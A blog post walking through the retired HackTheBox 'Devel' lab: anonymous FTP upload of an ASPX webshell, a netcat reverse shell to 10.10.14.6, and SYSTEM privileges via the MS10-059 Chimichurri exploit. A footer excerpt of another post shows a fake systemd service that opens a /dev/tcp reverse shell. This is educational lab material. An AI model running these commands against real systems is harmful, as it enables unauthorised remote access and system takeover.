Skip to main content

HackTheBox - Retired - Devel - Updated

Hackthebox - Retired - Devel


Recon

I've been using Threader3000 for my recon scans lately. It's a threaded python scanner that suggests nmap scans based on the results of the initial first up/down scan.



Just 2 open ports


I like to convert the nmap xml to html to make it easy on the eyes.

xsltproc ./10.10.10.5.xml -o ../devel.htb.html





So this looks like a microsoft box with an FTP open on 21 to anonymous and IIS 7.5 on port 80


Let's start with port 80 and see what they are serving up.



Just the standard IIS parking page.


FTP (logged in as anonymous)


Looks like the www folder for the webserver.


So anonymous has write permissions to the FTP so we can put any file we want in there… so I uploaded a webshell, that is pre-rolled with kali.




Exploit



Here you can see cmdasp.aspx in the root of what looks like the webserver.


Let's see if we can browse to this now.



That was quick and easy.


I used the FTP to upload nc.exe to devel to see if we could get a better shell.


I found the files we uploaded just using dir, eventually I found them in 


C:\inetpub\wwwroot\


So then I setup a listener on my kali box


Nc -lnvp 5555


And in the command window on devel I put in


C:\inetpub\wwwroot\nc.exe 10.10.14.6 5555 -e "cmd.exe"

Then I checked back in on my listener and 



We do have a low level shell..


I used the FTP to upload winpeas.bat to devel to see if we could get some basic enumeration on the box.


I don't know what the intended path is to "Own" this box but there are sure a lot of patches it's missing.



I don't know about you but, I love brazillian food so that Chimichurri one catches my eye. It looks like there are several vulnerabilities we could use going forward, you might try some of the others and see where you get.


https://rapid7.com/db/vulnerabilities/WINDOWS-HOTFIX-MS10-059



It says it's a privilege escalation vulnerability. Which an authenticated user can use to escalate privileges to the system, sounds like it's exactly what we are looking for.


I pretty quickly googled for an exploit and found this compiled exploit where we only need to supply the IP address and port of our listener for a reverse shell.


https://github.com/egre55/windows-kernel-exploits/tree/master/MS10-059:%20Chimichurri


I downloaded it and used the FTP to upload it to the C:\inetpub\wwwroot


Setup a new listener on my kali box


nc -lnvp 4455


And from my aspx shell ran this command.


C:\inetpub\wwwroot\Chimichurri.exe 10.10.14.6 4455




And just as advertised, we are "system" which means we have full access to everything about this computer.


Just a quick cd over to C:\users\administrator\desktop


And we can get the root flag.



I just realized that we didn't get the user flag, just a quick CD over to that folder.


This is redo of the first box I ever did on HackTheBox.eu  I can remember being blown away reading write ups on this box and how I could follow along and actually "Hack" a computer. I pleased to say I didn't need any write ups to follow on this box now, my skills are growing such that this box seemed pretty easy to me. If you are new to this too, keep going this might seem a bit hard and a bit like magic the first time you do it, you will get better and have a better understanding of what you are doing if you just keep at it..



Hack The Planet!


Labels:

Comments

Post a Comment

Popular posts from this blog

HacktheBox - Retired - Frolic

HacktheBox - Retired - Frolic Recon Let's start out with a threader3000 scan Some interesting results here Port 22 and 445 aren't uncommon… but 1880 and 9999 are.. Let's let nmap run through these ports  Option Selection: 1 nmap -p22,445,1880,9999 -sV -sC -T4 -Pn -oA 10.10.10.111 10.10.10.111 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-05 16:17 EDT Nmap scan report for 10.10.10.111 Host is up (0.060s latency). PORT     STATE SERVICE     VERSION 22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: |   2048 87:7b:91:2a:0f:11:b6:57:1e:cb:9f:77:cf:35:e2:21 (RSA) |   256 b7:9b:06:dd:c2:5e:28:44:78:41:1e:67:7d:1e:b7:62 (ECDSA) |_  256 21:cf:16:6d:82:a4:30:c3:c6:9c:d7:38:ba:b5:02:b0 (ED25519) 445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP) 1880/tcp open  http        Node.js (Express middlewar
Post a Comment
Read more

RingZero CTF - Forensics - Who am I part 2

RingZero CTF - Forensics -  Who am I part 2 Objective: I'm the proud owner of this website. Can you verify that? Solution: Well it took me a bit to figure this one out. I tried looking at the whois records for ringzer0ctf.com I tired looking at the DNS records for the site. I even looked in the Certificate for the site. Then I thought a little be more about the question. It's not asking how I can verify who own the site. It wants me to verify the owner themselves. Luckily at the bottom the page we see who is listed as on the twittter feeds @ringzer0CTF and @ MrUnik0d3r lets check if we can find the PGP for MrUniK0d3r online. I googled PGP and MrUn1k0d3r The very first result is his PGP  keybase.txt with his PGP at the bottom of the file is the flag FLAG-7A7i0V2438xL95z2X2Z321p30D8T433Z
Post a Comment
Read more

Abusing systemctl SUID for reverse shell

Today I came across a box that had the SUID set for systemctl connected as the apache user www-data I was able to get a root reverse shell. This is to document how to use this for privilege escalation. I used a bit from this blog https://carvesystems.com/news/contest-exploiting-misconfigured-sudo/ and a bit from here too https://hosakacorp.net/p/systemd-user.html Step1. Create a fake service I named my LegitService.service I placed it in the /tmp directory on the server. [Unit] UNIT=LegitService Description=Black magic happening, avert your eyes [Service] RemainAfterExit=yes Type=simple ExecStart=/bin/bash -c "exec 5<>/dev/tcp/10.2.21.243/5555; cat <&5 | while read line; do $line 2>&5 >&5; done" [Install] WantedBy=default.target Then in order to add this to a place we can use systemctl to call from I created a link from /tmp, since I didn't have permission to put the file in the normal systemd folders systemctl link /tmp/LegitService.service The
Post a Comment
Read more